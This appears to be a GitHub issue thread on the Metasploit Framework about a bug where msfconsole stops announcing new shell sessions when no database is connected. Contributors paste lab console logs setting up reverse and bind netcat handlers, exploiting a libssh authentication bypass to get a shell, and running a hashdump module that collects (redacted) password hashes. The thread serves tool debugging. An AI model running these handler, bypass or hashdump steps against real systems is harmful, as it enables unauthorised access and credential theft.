Metasploit-framework: Metasploit no longer reports when it receives a session

Created on 2 Jun 2018  ·  16 Comments  ·  Source: rapid7/metasploit-framework

I noticed starting about a week ago that Metasploit no longer reports when it receives a session.

At first this wasn't an issue, as I was testing a staged payload, so Sending stage (x bytes) in the console was a dead giveaway.

However, it's a problem. Observe:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.1.1.197:1337 

id
uid=501(qq) gid=20(staff) groups=20(staff),401(com.apple.access_screensharing),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),402(com.apple.sharepoint.group.1)
^C
Abort session 4? [y/N]  y

Had I not noticed the carriage return / line feed come through, I would not be aware a session was returned.

Fortunately, attempting to CTRL+C the running handler reveals the presence of a session. Observe:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.1.1.197:1337 

^C
Abort session 5? [y/N]  

I've performed no root cause analysis and don't intend to. At the time, I remember thinking 2c92e854942b24f3448acee1fe04a9b961a6c099 was the obvious culprit, but have not verified.

bug database

All 16 comments

I've seen this once before (months ago) but I could not find a way to reliably reproduce it.

I found that in msf5 too.

Always reproducible. Kali 1.0.6. Ruby 2.3.0. Metasploit5 from github.

I can't reproduce on Ubuntu, Ruby 2.3.0, f1701ecc93
@Green-m is it always occurring for you? Can you share your setup?

FAIL

env:

$ uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

$ ruby -v         
ruby 2.5.1p57 (2018-03-29 revision 63029) [x86_64-linux]

$ ./msfconsole -v                     
Framework Version: 5.0.0-dev-a3ccf2ba90

Still an issue.

msf5 exploit(multi/handler) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
msf5 exploit(multi/handler) > run

[*] Started bind handler

id
uid=0(root) gid=0(root) groups=0(root)

I wonder if it has to do with threading. I know in some languages output occurring on background threads doesn't show up in the foreground thread even if a mutex is used to lock the resource so it's guaranteed available. Would need to try to figure out where in the code this output normally comes from, though, to begin looking into it.

This appears to be related to the database. When no database is connected, Metasploit does not report new sessions.

As an aside, if you get a session, then start the database, then run a post module that makes use of the database, then Metasploit will complain Session can't be blank when it tries to store the data.

[-] Post failed: Exception Problem creating credential: Validation failed: Session can't be blank. See log for more details.
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:158:in `log_error'
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:8:in `rescue in create_credential'
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:4:in `create_credential'
[-]   /pentest/exploit/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-]   /pentest/exploit/metasploit-framework/modules/post/solaris/escalate/srsexec_readline.rb:105:in `run'
[*] Post module execution completed

Yup. Still an issue.

I still can't reproduce it. Let me try on Kali

Confirmed on my end when running with no database:

wvu@kharak:~/metasploit-framework:master$ ./msfconsole -nq
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
msf5 > version
Framework: 5.0.0-dev-c6cb6ce2f3
Console  : 5.0.0-dev-c6cb6ce2f3
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
spawn_pty => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions

Active sessions
===============

  Id  Name  Type   Information                                                  Connection
  --  ----  ----   -----------                                                  ----------
  1         shell   libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3)  172.28.128.1:61153 -> 172.28.128.3:2222 (172.28.128.3)

msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >

For the record, this is a known core issue and not a module issue.

#10820

I think I have found the reason and would fix this tomorrow!

See #10862

It looks like the second part of this issue wasn't fixed. The [-] Post failed: RuntimeError Problem creating credential: Validation failed: Session can't be blank. See log for more details. error is still thrown if the database is connected after receiving a session.

root@kali:/pentest/exploit/metasploit-framework# ./msfconsole -x "use exploit/multi/handler ; set payload linux/x64/meterpreter/reverse_tcp ; set lhost 172.16.191.188 ; set lport 1337 ; set exitonsession false ; run -jz; set payload cmd/unix/reverse_netcat; set lport 1338; run -jz"
[-] ***rtiNg the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***

Look at you, hacker:
   a pathetic creature of meat and bone,
      panting and sweating as you run through my corridors.
         How can you challenge a perfect, immortal machine?


       =[ metasploit v5.0.2-dev-e98c4ae                   ]
+ -- --=[ 1869 exploits - 1051 auxiliary - 322 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

payload => linux/x64/meterpreter/reverse_tcp
lhost => 172.16.191.188
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
payload => cmd/unix/reverse_netcat
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.191.188:1337 

[*] Started reverse TCP handler on 172.16.191.188:1338 
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.191.188:1338 -> 172.16.191.188:52717) at 2019-01-19 22:31:52 -0500

msf5 exploit(multi/handler) > db_connect msf:[email protected]:5432/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[-] Post failed: RuntimeError Problem creating credential: Validation failed: Session can't be blank. See log for more details.
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:174:in `log_error'
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:9:in `rescue in create_credential'
[-]   /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:4:in `create_credential'
[-]   /pentest/exploit/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-]   /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:48:in `block in run'
[-]   /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:35:in `each_line'
[-]   /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:35:in `run'
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > sessions -K
[*] Killing all sessions...
[*] 172.16.191.188 - Command shell session 1 closed.
msf5 post(linux/gather/hashdump) > exit
root@kali:/pentest/exploit/metasploit-framework# ./msfconsole -x "use exploit/multi/handler ; set payload linux/x64/meterpreter/reverse_tcp ; set lhost 172.16.191.188 ; set lport 1337 ; set exitonsession false ; run -jz; set payload cmd/unix/reverse_netcat; set lport 1338; run -jz"
[-] ***rting thE Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***


 _________________________________________________________
|                                                         |
|  > QUERY FOR CLEARANCE                                  |
|                                                         |
|  ....                                                   |
|                                                         |
|  ACCESS DENIED                                          |
|                                                         |
|  > INITIATE BATTERING RAM                               |
|                                                         |
|  <A>NEV/HJS<KBA>(NET1=3V)MB1 -NK                        |
|  (BEM)RAMJET/SYPHON -XP FUNCTIONS                       |
|  TO SECONDRAY SYSTEMS {WATC} DEL SHA                    |
|  --SOFTWARE OVERRIDE....                                |
|                                                         |
|  <P> PROGRAM - SYPHON/CIT                               |
|  <C> MUTAGENIC RESARCH FILES/NES                        |
|  TO-<B> SWITCH K*CODE/MEMORY ALPHA                      |
|  NULL/NOID PROCESS0045                                  |
|                                                         |
|  ....                                                   |
|                                                         |
|  SECURITY SYSTEM DISABLED                               |
|_________________________________________________________|


       =[ metasploit v5.0.2-dev-e98c4ae                   ]
+ -- --=[ 1869 exploits - 1051 auxiliary - 322 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

payload => linux/x64/meterpreter/reverse_tcp
lhost => 172.16.191.188
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
payload => cmd/unix/reverse_netcat
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.191.188:1337 

[*] Started reverse TCP handler on 172.16.191.188:1338 
msf5 exploit(multi/handler) > db_connect msf:[email protected]:5432/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.191.188:1338 -> 172.16.191.188:52736) at 2019-01-19 22:32:52 -0500

msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] root:$6$<redacted>:0:0:root:/root:/bin/bash
[+] msf:$6$<redacted>:1000:1001:,,,:/home/msf:/bin/bash
[+] asdf:$6$<redacted>:1001:1003:,,,:/home/asdf:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190119223258_default_172.16.191.188_linux.hashes_767117.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > 
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private                                                                                             realm  private_type
----  ------          -------  ------  -------                                                                                             -----  ------------
      172.16.191.188           asdf    $6$<redacted>         Nonreplayable hash
      172.16.191.188           root    $6$<redacted>         Nonreplayable hash
      172.16.191.188           msf     $6$<redacted>         Nonreplayable hash